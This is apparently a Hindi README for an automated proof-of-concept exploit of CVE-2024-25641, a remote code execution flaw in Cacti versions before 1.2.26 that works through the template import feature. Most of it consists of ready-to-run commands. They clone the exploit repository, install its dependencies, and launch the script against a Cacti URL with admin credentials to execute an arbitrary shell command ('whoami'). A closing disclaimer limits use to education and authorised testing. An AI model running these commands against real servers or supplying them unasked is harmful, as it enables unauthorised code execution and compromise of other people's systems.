
पूर्णतः स्वचालित PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵
प्रमाणित RCECacti संस्करण < v1.2.26पैकेज आयात सुविधा के माध्यम से शोषण योग्य एक मनमाना फ़ाइल लेखन भेद्यता, "आयात टेम्पलेट" अनुमति रखने वाले प्रमाणित उपयोगकर्ताओं को वेब सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है (RCE)।

git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
pip install -r requirements.txt
python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26
poetry install
poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
यह टूल केवल शैक्षिक और परीक्षण उद्देश्यों के लिए है। इस टूल का लेखक इसके साथ किए गए किसी भी दुरुपयोग या अवैध गतिविधियों के लिए जिम्मेदार नहीं है। इस टूल का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है।